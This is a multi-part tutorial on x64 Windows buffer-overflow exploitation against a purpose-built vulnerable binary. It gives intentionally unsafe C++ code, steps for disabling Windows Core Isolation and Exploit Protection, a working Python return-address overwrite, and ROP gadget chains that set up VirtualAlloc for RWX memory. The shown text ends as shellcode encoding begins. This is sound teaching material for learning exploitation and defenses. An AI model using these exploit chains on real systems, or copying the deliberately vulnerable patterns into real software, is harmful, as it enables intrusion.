Buffer Overflows in the Modern Era

Part One

Environment Setup & x64dbg Fundamentals

// Disabling protections, compiling the target, and manually controlling RIP

Learning Objectives

Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
Compile the vulnerable binary with stack protections disabled using MinGW-w64
Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
Manually redirect RIP to an unreachable function using the debugger
Understand why x64 buffer overflows use ROP rather than JMP RSP

The Challenge — x64 on Windows 11

Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always enforced for 64-bit processes, backed by the CPU's NX bit. ASLR randomizes module base addresses every boot. Stack canaries are on by default in modern compilers such as MSVC (/GS). The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.

This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.

Step 1 — Disable Windows Protections for Learning

Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.

Two locations to toggle off in Windows Security:

Navigate to: Windows Security → Device Security → Core Isolation → Core Isolation Details

Disable all toggles in this section, including Memory Integrity. These features enforce integrity checks on code running in the kernel and may restrict memory operations that our exploit relies on. Disabling them for the learning environment does not permanently weaken your system; just re-enable them after completing Parts 1–4.

⚠ Disabling Memory Integrity requires a reboot. You may see a notification in the taskbar warning that protection is reduced; this is expected during the lab phase.

Navigate to: Windows Security → App & Browser Control → Exploit Protection → System Settings

Disable DEP, ASLR, SEHOP, and all other protections listed. DEP (Data Execution Prevention) is the primary barrier: it prevents executing code on the stack. For 64-bit processes such as ours, however, Windows always enforces DEP (via the CPU's NX bit), whatever this setting says. The series acknowledges this and works around it with VirtualAlloc (Part 3) and memcpy (Part 4), moving the shellcode into a separate RWX memory region rather than executing it on the stack directly.

💡 Hardware DEP on modern x64 CPUs cannot be fully disabled by software settings alone. This is why the exploit uses VirtualAlloc + memcpy to move shellcode to a proper RWX region rather than attempting to execute directly from the stack.

Step 2 — The Vulnerable Binary

The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:

      C++
      overflow.cpp — the vulnerable target binary
    
// overflow.cpp — g3tsyst3m
// Intentionally vulnerable binary for the buffer overflow series
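// Compile: x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static
// Note: build in C++17 mode or earlier (add -std=c++17 if your compiler defaults to a newer
// standard). Since C++20, operator>> into a char array stops at the array size, which would
// prevent the overflow.

#include <windows.h>
#include <cstdio>    // printf
#include <cstdlib>   // system
#include <iostream>
#include <cstring>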

// win_function() is intentionally never called by main()
// Goal: demonstrate controlling RIP by redirecting execution here
void win_function() {
    std::cout << "You have successfully exploited the program!\n";
    system("calc.exe");
}

void vulnerable_function() {
    char buffer[275];     // 275-byte buffer — no bounds checking
    std::cout << "Enter some input: ";
    std::cin >> buffer;  // UNSAFE: stops at whitespace, no length limit
}

int main() {
    // VirtualAlloc intentionally imported and called here so it appears
    // in the binary's import table — we'll resolve its address via x64dbg
    // and use it as a ROP chain target in later parts
    LPVOID mem = VirtualAlloc(NULL, 1024,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem) printf("Memory allocated at %p\n", mem);

    std::cout << "Welcome to the vulnerable program!\n";
    vulnerable_function();
    std::cout << "Goodbye!\n";
    return 0;
}

Compile Flags — What Each Does and Why It Matters

      Shell
      Compile command with explanation
    
x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static

# -fno-stack-protector
#   Disables stack canaries. Without this, GCC inserts a random value
#   between the buffer and the saved return address. If the canary is
#   overwritten, the program terminates before RIP can be hijacked.
#   With this flag: we can overwrite the return address freely.

# -no-pie
#   Disables Position Independent Executable — the compiler's form of ASLR.
#   A PIE binary loads at a random base address every run, making static
#   addresses in ROP chains invalid. With -no-pie: binary loads at a fixed
#   base (0x140000000), so our gadget addresses are stable across runs.
#   NOTE: We re-enable ASLR in Part 5 and solve it programmatically.

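# -static
#   Links the GCC and C++ runtime libraries (libstdc++, libgcc) into the
#   executable instead of loading them from DLLs. The bigger binary gives
#   us far more ROP gadgets. Windows APIs such as VirtualAlloc cannot be
#   linked statically: they are still imported from kernel32.dll, but the
#   import address table (IAT) slot holding each API pointer sits at a
#   fixed address inside overflow.exe, independent of DLL load order.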
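
Whether -no-pie really produced a fixed-base image depends on the toolchain. Recent MinGW-w64/GNU ld releases may mark PE images as relocatable (the DYNAMIC_BASE flag) by default, in which case a linker option such as -Wl,--disable-dynamicbase may also be needed (check `ld --help` for your version; this is an assumption to verify, not something the series states). Rather than assume, the sketch below reads the relevant header fields directly. It is a minimal parser written for this note, assuming a 64-bit (PE32+) image, with field offsets taken from the PE/COFF format.

```python
import struct

IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE    = 0x0040   # image opts in to ASLR relocation
IMAGE_DLLCHARACTERISTICS_NX_COMPAT       = 0x0100   # image opts in to DEP


def pe_mitigation_flags(image: bytes) -> dict:
    """Parse just enough of a PE32+ header to report ImageBase and the ASLR/DEP opt-in flags."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)          # offset of the PE signature
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                                       # skip signature + COFF file header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic != 0x20B:
        raise ValueError("not a PE32+ (64-bit) image")
    (image_base,) = struct.unpack_from("<Q", image, opt + 24)     # preferred load address
    (dll_chars,) = struct.unpack_from("<H", image, opt + 70)      # DllCharacteristics
    return {
        "image_base": image_base,
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "high_entropy_va": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }
```

For example, `pe_mitigation_flags(open("overflow.exe", "rb").read())` should report an image_base of 0x140000000 and, if the build behaved as intended, dynamic_base False.
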

Basic x64dbg workflow for this series:
- File → Open → select overflow.exe to load it
- Run (F9) twice — first run executes to the entry point, second gets the program running
- Set breakpoint — double-click on an address in the disassembly panel to toggle a breakpoint (red highlight)
- Step Over (F8) — execute the current instruction without following calls into functions
- Step Into (F7) — follow a CALL instruction into the called function
- Registers panel (top right) — shows current value of all 64-bit registers; changed values highlight in red
- Stack panel (bottom right) — shows the stack contents at RSP; critical for watching ROP gadget execution
💡 On a laptop with Fn key: use Fn+F8 for step over and Fn+F7 for step into. The function key behavior varies by laptop manufacturer.

In x86 buffer overflows the classic technique is: overwrite the saved EIP with the address of a JMP ESP instruction and place shellcode on the stack right after it. When the function returns into that gadget, ESP points just past the overwritten return address, so JMP ESP transfers control directly into the shellcode on the stack.

This doesn't work in x64 for two reasons:
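- DEP/NX: hardware-enforced non-executable stack. Even if you redirect RIP to the stack, the CPU raises a fault before executing any instruction there, and for a 64-bit process this cannot be turned off by software settings.
- RIP canonicality: x64 addresses must be canonical (with 48-bit virtual addresses, bits 63 through 47 must all be equal), and user-mode addresses on Windows stay at or below 0x00007FFFFFFFFFFF. A junk return address such as 0x4141414141414141 is non-canonical, so the RET faults before RIP changes: instead of seeing 0x41414141 in the instruction pointer as in x86, you see RIP parked on the RET and the junk value sitting at [RSP]. Execution is controlled by what's on the stack and what RET pops.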
ROP solves both: we chain together existing executable code snippets already in the binary (in read+execute memory, not the stack). Each gadget ends with RET, which pops the next gadget address from our controlled stack. No new code is executed on the stack — we're reusing what's already there.
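
The canonical-address rule is easy to check by hand. The sketch below is an illustrative model of the CPU's check, not code the exploit needs; it assumes 48-bit virtual addresses (4-level paging), where bits 63 through 47 must all be copies of the same bit.

```python
def is_canonical(addr: int, va_bits: int = 48) -> bool:
    """True if bits 63..(va_bits - 1) of a 64-bit address are all 0 or all 1."""
    if not 0 <= addr < 1 << 64:
        raise ValueError("not a 64-bit value")
    top = addr >> (va_bits - 1)                # bits that must copy the highest VA bit
    return top == 0 or top == (1 << (65 - va_bits)) - 1


def ret_outcome(saved_return_address: int) -> str:
    """What happens when RET pops this value (simplified model)."""
    if is_canonical(saved_return_address):
        return f"RIP = {saved_return_address:#018x}"
    return "#GP fault: RIP stays on the RET, junk remains visible at [RSP]"


print(ret_outcome(0x14000158C))
print(ret_outcome(0x4141414141414141))
```

The first call models a redirect to win_function(); the second models an overflow with pure junk, which is why x64dbg never shows 0x4141414141414141 in RIP.
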
Part 1 demonstrates debugger control before any exploit code. The workflow:
- Load overflow.exe in x64dbg and run it
- Find the address of win_function() in the disassembly — note it (around 0x14000158C)
- Set a breakpoint at the instruction after the std::cin call (0x1400015FB)
- Enter any input in the command prompt window
- Hit the breakpoint, then press F8 twice
- Double-click the RIP value in the register panel and type the address of win_function
- Press F9 to resume execution (or keep stepping with F8): calc.exe launches even though the program never calls win_function()
This manual RIP manipulation is exactly what the buffer overflow automates in Part 2 — instead of typing in the address by hand, the overflow payload overwrites the return address on the stack so that when the function returns, it returns to win_function().

Part Two

The First Real Buffer Overflow — Controlling RIP with Python

// 296 bytes of junk, one struct.pack, and a calculator

Learning Objectives

Determine the exact byte offset needed to reach the return address (296 bytes)
Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
Attach x64dbg to a running process and verify stack control
Observe how the overflow reaches the return address without placing it directly in RIP

Finding the Offset — 296 Bytes

The buffer is declared as char buffer[275], but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead: saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern such as the one produced by pwntools' cyclic() (also available as pwndbg's cyclic command).

Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.
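
Instead of guessing in steps, a cyclic (de Bruijn) pattern pins the offset down in one run: every 8-byte window in it is unique, so the qword you read at [RSP] when the RET faults identifies exactly where in the input it came from. The sketch below is a self-contained re-implementation for illustration (the standard recursive de Bruijn construction), not pwntools' own code. It uses lowercase letters only, so std::cin reads the whole pattern without stopping at whitespace.

```python
import string
import struct
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` (recursive Lyndon-word construction)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 8) -> bytes:
    """First `length` bytes of the pattern; every n-byte window is unique."""
    alphabet = string.ascii_lowercase.encode()      # no whitespace, so std::cin reads it all
    return bytes(islice(de_bruijn(alphabet, n), length))


def cyclic_find(qword: int, length: int = 4096, n: int = 8) -> int:
    """Offset of an 8-byte value (as read from [RSP], little-endian) in the pattern, or -1."""
    return cyclic(length, n).find(struct.pack("<Q", qword))
```

Usage: send cyclic(400) as the program's input, copy the qword at [RSP] from x64dbg's stack panel when the RET faults, and pass it to cyclic_find(); for this binary the result should match the 296-byte offset.
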

      Python
      overflow_part2.py — first working buffer overflow redirecting to win_function()
    
# overflow_part2.py — g3tsyst3m Part 2
# Sends 296 bytes of junk followed by an address inside win_function()
# 0x14000158C lies just past win_function's prologue, confirmed in x64dbg

import struct
import subprocess

# 296 bytes fills the buffer AND overwrites up to the saved return address
junk = 296
payload = b"\x41" * junk

# Append the address of win_function() in little-endian 64-bit format
# struct.pack("<Q", addr) = 8 bytes, little-endian unsigned 64-bit
# 0x14000158C is the address INSIDE win_function after stack alignment setup
# (not the very first instruction — skip past the stack alignment prologue)
payload += struct.pack("<Q", 0x14000158C)

process = subprocess.Popen(
    ["C:/path/to/overflow.exe"],   # update to your path
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

# Pause to allow attaching x64dbg before sending payload
input("Attach overflow.exe to x64dbg, then press Enter...")

stdout, stderr = process.communicate(input=payload)
print(stdout.decode())
if stderr:
    print(stderr.decode())

Why We Don't See the Address in RIP

A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register. Instead, registers restored from the overwritten stack frame (such as RBP) may show 0x4141414141414141 from the junk bytes, while the win_function() address sits on the stack at [RSP], waiting to be popped into RIP when the function's RET executes.

This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.

The Python script pauses before sending the payload to allow attaching the debugger. In x64dbg:
- File → Attach (or Alt+A) → find overflow.exe in the process list → double-click
- x64dbg attaches and breaks. Your previously set breakpoints should still be active.
- Press F9 (Run) to let the process continue waiting for input
- Switch back to the Python terminal and press Enter to send the payload
- x64dbg should hit the breakpoint at 0x1400015FB
💡 The attach workflow is important because it mirrors real-world exploitation — you don't get to compile the target with debug symbols or control its launch. Attaching to a running process is the standard approach.
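
win_function() begins with a function prologue (typically a push and a stack adjustment). The Windows x64 calling convention requires RSP to be 16-byte aligned before a CALL, and the CALL itself pushes an 8-byte return address, so every function expects to start 8 bytes off a 16-byte boundary and its prologue realigns from there. Entering via RET instead pops 8 bytes, so the function starts 8 bytes away from what its prologue expects. If the full prologue runs, the calls inside win_function() happen on a misaligned stack, and an instruction that requires 16-byte alignment (such as movaps inside system() or the iostream code) can crash.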

0x14000158C is the address inside win_function() after the prologue — at the point where the actual work (printing and calling calc.exe) begins. The stack is already aligned at this point, so execution proceeds cleanly.
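
The alignment issue comes down to 8 bytes, which a little arithmetic shows. This is a simplified model with hypothetical addresses, assuming RSP was 16-byte aligned at main's CALL (as the ABI requires) and that the part of the prologue we skip amounts to a single 8-byte push. It also shows a common alternative fix that is not used in this series: chaining a lone RET gadget first, so one extra 8-byte pop restores the expected alignment.

```python
STACK_SLOT = 8   # CALL, RET, PUSH and POP each move RSP by one 8-byte slot


def entry_rsp(rsp_before_call: int, via: str) -> int:
    """RSP at the first instruction of the target function.

    rsp_before_call: RSP just before a CALL (16-byte aligned by the ABI)
    via="call":       normal path, the CALL pushes a return address
    via="ret":        hijacked path, vulnerable_function's RET pops our overwritten slot
    via="ret_gadget": hijacked path with a lone RET gadget chained in first
    """
    if via == "call":
        return rsp_before_call - STACK_SLOT
    ret_slot = rsp_before_call - STACK_SLOT      # where vulnerable_function's return address lives
    if via == "ret":
        return ret_slot + STACK_SLOT             # one RET pops one slot
    if via == "ret_gadget":
        return ret_slot + 2 * STACK_SLOT         # our RET, then the lone RET gadget
    raise ValueError(via)


RSP_IN_MAIN = 0x22FE40   # hypothetical, 16-byte aligned
for path in ("call", "ret", "ret_gadget"):
    print(f"{path:<10} entry RSP % 16 = {entry_rsp(RSP_IN_MAIN, path) % 16}")
```

A normal CALL entry gives 8 and the hijacked RET entry gives 0. Skipping one 8-byte push in the prologue, or running a RET gadget first, brings the function back to the state it expects.
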

In later parts when we're building real ROP chains, this distinction becomes critical: ROP gadgets themselves don't have prologues — they're just mid-function code sequences ending in RET, and the stack state is whatever our ROP chain has constructed.
DEP (Data Execution Prevention) marks the stack as non-executable at the hardware level via the CPU's NX (No-Execute) bit. When the CPU attempts to execute an instruction at a non-executable memory address, it raises a hardware fault (#PF with execute-disable) before the instruction runs.

This is why the classic x86 technique — place shellcode in the buffer, redirect EIP/RIP to it — fails on modern Windows. Even if you successfully overwrite the return address to point into the buffer, the CPU refuses to execute from there.

The solution (covered in Part 3): use VirtualAlloc to allocate a new memory region with PAGE_EXECUTE_READWRITE permissions. The stack remains non-executable, but the newly allocated region is, and we copy our shellcode there with memcpy before jumping to it.

Part Three

ROP Chains — Building the VirtualAlloc Call

// Hunting gadgets, setting registers, defeating DEP without touching the stack

Learning Objectives

Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
Understand why some registers (R8, R9) require creative multi-gadget chains
Find the address of a specific constant value in memory using x64dbg's memory search
Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode

What Are ROP Gadgets?

ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.

The goal here is to call VirtualAlloc(NULL, dwSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP: no shellcode, no executable stack. dwSize only has to cover the 251-byte shellcode section, so any comfortably larger value works. We need to set four registers to specific values:

      Python
      VirtualAlloc register requirements — what we need to build
    
# VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
# Windows x64 calling convention: RCX, RDX, R8, R9

RCX = 0x00000000   # lpAddress = NULL (OS chooses the address)
RDX = 0x00001002   # dwSize    = 4098 bytes (any size >= the shellcode works)
R8  = 0x00003000   # flAllocationType = MEM_COMMIT | MEM_RESERVE
R9  = 0x00000040   # flProtect = PAGE_EXECUTE_READWRITE

Finding Gadgets — Ropper and ROPgadget

      Shell
      Dump all gadgets to text files for manual review
    
# Ropper — dumps all gadgets with their addresses
ropper -f overflow.exe > ropgadgets_ropper.txt

# ROPgadget — alternative tool, useful for cross-validation
py ROPgadget.py --binary overflow.exe > ropgadgets_rop.txt

# Both tools find largely the same gadgets, but format them differently:
# Ropper prints "pop rax; ret;", ROPgadget prints "pop rax ; ret"
# Search the output file for patterns like:
#   grep "pop rax; ret" ropgadgets_ropper.txt
#   grep "xor ecx, ecx" ropgadgets_ropper.txt
#   grep "mov r8" ropgadgets_ropper.txt
# On Windows without grep: findstr /C:"pop rax; ret" ropgadgets_ropper.txt
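
Instead of grep, a few lines of Python can load either tool's output and filter it. The sketch below is our own helper, not part of either tool. It assumes the "address: instructions" line format both tools print (Ropper separates instructions with "; ", ROPgadget with " ; ") and strips ANSI colour codes in case they ended up in the file. It also drops gadgets whose packed address contains a byte std::cin treats as whitespace (0x09 to 0x0D, 0x20), since such an address would cut the payload short.

```python
import re

ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;]*m")                     # colour codes, if present
GADGET_LINE = re.compile(r"^\s*(0x[0-9a-fA-F]+)\s*:\s*(.+?)\s*$")
CIN_WHITESPACE = b"\x09\x0a\x0b\x0c\x0d\x20"


def normalise(insns: str) -> str:
    """'pop rax ; ret' and 'pop rax; ret;' both become 'pop rax; ret'."""
    return "; ".join(part.strip() for part in insns.split(";") if part.strip())


def parse_gadgets(text: str) -> dict:
    """Map gadget address -> normalised instruction string."""
    gadgets = {}
    for raw in text.splitlines():
        match = GADGET_LINE.match(ANSI_ESCAPE.sub("", raw))
        if match:                                  # skip banners, headers and summaries
            gadgets[int(match.group(1), 16)] = normalise(match.group(2))
    return gadgets


def search_gadgets(gadgets: dict, needle: str, bad: bytes = CIN_WHITESPACE) -> list:
    """(address, instructions) pairs containing `needle` whose packed address avoids `bad`."""
    needle = normalise(needle)
    return [
        (addr, insns)
        for addr, insns in sorted(gadgets.items())
        if needle in insns and not any(byte in bad for byte in addr.to_bytes(8, "little"))
    ]
```

Usage: `search_gadgets(parse_gadgets(open("ropgadgets_ropper.txt").read()), "pop rax; ret")` returns matching gadgets in address order.
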

Setting RCX = 0 (Easy)

The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:

      Python
      RCX gadget — xor ecx, ecx; mov rax, r9; ret
    
# Found via: grep "xor ecx" ropgadgets_ropper.txt
# The "mov rax, r9" side effect is acceptable — we don't care about RAX here

payload += struct.pack("<Q", 0x14000276f)  # xor ecx, ecx; mov rax, r9; ret;
# RCX = 0 ✓

Setting RDX = 0x1002 (Moderate)

No gadget sets RDX to a suitable value directly. The creative solution: use a mov edx, 2 gadget (which ends in call rax), then a pop rax; ret gadget to load the memory address where the DWORD 0x1000 is stored in the binary (found via memory search in x64dbg), dereference it into EAX, and add it to EDX. The result is 0x1002 (0x2 + 0x1000 = 4098 bytes), more than enough allocation size:

      Python
      RDX gadget chain — creative multi-gadget value construction
    
# Memory search trick: in x64dbg, Memory Map → search for value 0x1000
# First result: address 0x1400000AC contains the DWORD value 0x1000 (4096)
# We'll pop this address into RAX, then dereference it to get 0x1000 into EAX

payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops the next qword into RAX
payload += struct.pack("<Q", 0x140001f8c)  # VALUE for RAX: address of the pop rax; ret gadget (the call target below)
payload += struct.pack("<Q", 0x140001243)  # mov edx, 2; xor ecx, ecx; call rax;  ← EDX=2, ECX=0; CALL pushes a return address and jumps to pop rax; ret, which discards it and RETs into the next qword
payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops the next qword into RAX
payload += struct.pack("<Q", 0x1400000AC)  # VALUE: this is the ADDRESS where 0x1000 lives in memory
payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← dereference: EAX = 0x1000
payload += struct.pack("<Q", 0x140006995)  # add edx, eax; mov eax, edx; ret;  ← EDX = 0x2 + 0x1000 = 0x1002 ✓
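
The call rax step is the subtle part of this chain. A toy model helps: below, the stack is a Python list of qwords, and each gadget is a function that updates registers and returns the next RIP. It is a simplified illustration, not an emulator. The return address pushed by CALL is a made-up value, and memory holds only the one DWORD the chain reads.

```python
MASK32 = 0xFFFFFFFF
END = 0x4242424242424242                       # sentinel placed after the chain


class Cpu:
    """The stack is a list of qwords; `sp` is the index of the qword RSP points at."""

    def __init__(self, chain, memory):
        self.stack, self.sp, self.mem = list(chain) + [END], 0, memory
        self.regs = {"rax": 0, "rcx": 0x1111, "rdx": 0x2222}

    def pop(self):
        value = self.stack[self.sp]
        self.sp += 1
        return value

    def push(self, value):
        self.sp -= 1                           # reuses the slot the last RET already consumed
        self.stack[self.sp] = value


def pop_rax(cpu):                              # 0x140001f8c: pop rax; ret
    cpu.regs["rax"] = cpu.pop()
    return cpu.pop()


def mov_edx_2_call_rax(cpu):                   # 0x140001243: mov edx, 2; xor ecx, ecx; call rax
    cpu.regs["rdx"] = 2                        # 32-bit writes zero-extend into RDX / RCX
    cpu.regs["rcx"] = 0
    cpu.push(0x1400DEAD0)                      # HYPOTHETICAL return address pushed by CALL
    return cpu.regs["rax"]


def mov_eax_deref_rax(cpu):                    # 0x140007678: mov eax, dword ptr [rax]; ret
    cpu.regs["rax"] = cpu.mem[cpu.regs["rax"]] & MASK32
    return cpu.pop()


def add_edx_eax(cpu):                          # 0x140006995: add edx, eax; mov eax, edx; ret
    cpu.regs["rdx"] = (cpu.regs["rdx"] + cpu.regs["rax"]) & MASK32
    cpu.regs["rax"] = cpu.regs["rdx"]
    return cpu.pop()


GADGETS = {0x140001F8C: pop_rax, 0x140001243: mov_edx_2_call_rax,
           0x140007678: mov_eax_deref_rax, 0x140006995: add_edx_eax}

RDX_CHAIN = [0x140001F8C, 0x140001F8C, 0x140001243,
             0x140001F8C, 0x1400000AC, 0x140007678, 0x140006995]


def run(chain, memory):
    cpu = Cpu(chain, memory)
    rip = cpu.pop()                            # vulnerable_function's RET takes the first qword
    while rip != END:
        rip = GADGETS[rip](cpu)
    return cpu.regs


regs = run(RDX_CHAIN, memory={0x1400000AC: 0x1000})
print({name: hex(value) for name, value in regs.items()})
```

The run ends with RDX = 0x1002 and RCX = 0. The address pushed by CALL lands in an already-consumed slot and is popped straight back off, so the chain carries on as if the CALL never happened.
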

Setting R8 = 0x3000 and R9 = 0x40 (Hard)

R8 and R9 are used sparingly in the binary's code, so few gadgets manipulate them directly. The solution routes values through RAX and RBX as intermediaries. R9 in particular is "hated": it requires a gadget that also includes add rsp, 0x48, which advances the stack pointer by 72 bytes, so the chain needs padding at that point to compensate. The padding bytes (\x90 here) are skipped over, never executed:

      Python
      R9 gadget chain — the painful one (add rsp,48 requires NOP padding)
    
# R9 = 0x40 (PAGE_EXECUTE_READWRITE)
# Strategy: load 0x40 into RAX via memory dereference, move RAX→RBX,
# then use the only available "mov r9, rbx" gadget — which unfortunately
# also includes "add rsp, 0x48" that skips 72 bytes ahead on the stack.
# Compensate by padding 72+32=104 bytes of NOPs after the gadget address.

payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
payload += struct.pack("<Q", 0x140000018)  # address where 0x40 lives in the binary
payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← RAX = 0x40
payload += struct.pack("<Q", 0x140001b58)  # push rax; pop rbx; pop rsi; pop rdi; ret;  ← RBX = 0x40 (pops 2 extra values)
payload += b"\x90" * 16                       # padding for the 2 extra pops (rsi, rdi)
payload += struct.pack("<Q", 0x140007CA5)  # mov r9, rbx; [...]; add rsp,0x48; pop rbx/rsi/rdi/rbp; ret;
#                                               ↑ this gadget moves RSP forward 0x48 (72) bytes
#                                               and then pops rbx+rsi+rdi+rbp (32 more bytes)
#                                               total: 104 bytes of stack we need to pad over
payload += b"\x90" * 72                       # compensate for add rsp, 0x48
payload += b"\x90" * 32                       # compensate for pop rbx/rsi/rdi/rbp
# R9 = 0x40 ✓ (finally)

A key technique in this part: when you need to load a specific value into a register but can't find a mov reg, imm gadget, find a location in the binary's mapped image where that value already exists and use a memory dereference gadget (mov eax, dword ptr [rax]) to load it.

In x64dbg: Memory Map tab → right-click the binary's section → Search for Pattern → enter the hex value you need. The tool returns all addresses where that byte sequence appears. Pick the first result in the binary's own memory range (not a DLL).
- Value 0x1000 (4096 decimal, the building block for dwSize) was found at 0x1400000AC
- Value 0x0040 (0x40 = PAGE_EXECUTE_READWRITE) was found at 0x140000018
- Value 0x3000 (MEM_COMMIT|MEM_RESERVE) was found at 0x1400095AC
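💡 This technique works because the compiler often embeds constant values from the source code into the binary's .text or .rdata sections. A statically linked binary is particularly rich because it includes the runtime libraries with their own constants. Even the PE headers help: 0x140000018 and 0x1400000AC both lie in the image's first page, where the headers are mapped, so those two values are header fields (offset 0x18 is the DOS header's e_lfarlc field, conventionally 0x40).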
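
The Memory Map search can also be reproduced offline. This sketch assumes `image` is a byte dump of the module as it is mapped in memory, so index i corresponds to address image_base + i. For values in the header page, the first 0x1000 bytes of overflow.exe on disk are laid out the same way. The target constants are the documented Win32 values.

```python
import struct

MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE = 0x1000, 0x2000, 0x40
TARGETS = {
    "dwSize building block": 0x1000,
    "flAllocationType (MEM_COMMIT | MEM_RESERVE)": MEM_COMMIT | MEM_RESERVE,   # 0x3000
    "flProtect (PAGE_EXECUTE_READWRITE)": PAGE_EXECUTE_READWRITE,              # 0x40
}


def find_dword(image: bytes, image_base: int, value: int, limit: int = 5) -> list:
    """Addresses where `value` occurs as a little-endian DWORD, i.e. what
    `mov eax, dword ptr [rax]` would load if RAX held that address."""
    needle = struct.pack("<I", value)
    hits, start = [], 0
    while len(hits) < limit:
        index = image.find(needle, start)
        if index < 0:
            break
        hits.append(image_base + index)
        start = index + 1                      # allow overlapping matches
    return hits
```

Passing each value from TARGETS to find_dword() mirrors the x64dbg search; as there, prefer hits inside the module itself.
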

Real ROP chains almost never use gadgets that do exactly one thing. The reality is you work with whatever the binary provides. Common side effects and how to handle them:
- Extra POPs: a gadget that pops into registers you don't care about. Solution: pad those stack positions with junk values. 0x90 bytes are a common choice, but the values are only loaded into registers, never executed, so any bytes free of bad characters work.
- add rsp, N: advances the stack pointer, skipping over N bytes of your carefully laid chain. Solution: pad those N bytes after the gadget address in your payload.
- Clobbering registers: a gadget that overwrites a register you already set. Solution: order your gadgets carefully, setting the clobbered register after the gadget that clobbers it.
- CALLs inside gadgets: a CALL pushes a return address onto your stack and jumps to its target. Solution: load the target register (usually RAX) beforehand with the address of a pop; ret gadget, which discards the pushed address and returns into the next qword of the chain.
This creativity is what makes ROP chain development genuinely difficult. It's less programming and more puzzle-solving with the specific pieces available in your binary.
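
The padding rules above reduce to one line of arithmetic per gadget. This sketch is a helper of our own naming; it assumes any PUSH inside a gadget is immediately balanced by a POP (as in push rax; pop rbx), so only the net movement of RSP matters.

```python
import struct


def filler_len(pops: int = 0, pushes: int = 0, add_rsp: int = 0) -> int:
    """Bytes of the chain a gadget consumes between its own address and its final RET."""
    consumed = 8 * (pops - pushes) + add_rsp
    if consumed < 0:
        raise ValueError("gadget moves RSP backwards and would overwrite earlier chain slots")
    return consumed


def gadget(addr: int, pops: int = 0, pushes: int = 0, add_rsp: int = 0,
           fill: bytes = b"\x90") -> bytes:
    """Packed gadget address followed by the filler its side effects will skip over."""
    if len(fill) != 1:
        raise ValueError("fill must be a single byte")
    return struct.pack("<Q", addr) + fill * filler_len(pops, pushes, add_rsp)


print(filler_len(pops=3, pushes=1))       # push rax; pop rbx; pop rsi; pop rdi; ret
print(filler_len(pops=4, add_rsp=0x48))   # mov r9, rbx; ...; add rsp, 0x48; 4 pops; ret
```

The two calls reproduce the 16 and 104 filler bytes used in the R9 chain.
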

Part Four

Shellcode Encoding, memcpy Chain & Full Exploit

// XOR encoding + decoder stub + memcpy ROP = working shellcode execution

Learning Objectives

Understand why std::cin requires encoding — bad characters that break payload delivery
XOR-encode shellcode with key 0xAC and embed a self-decoding stub
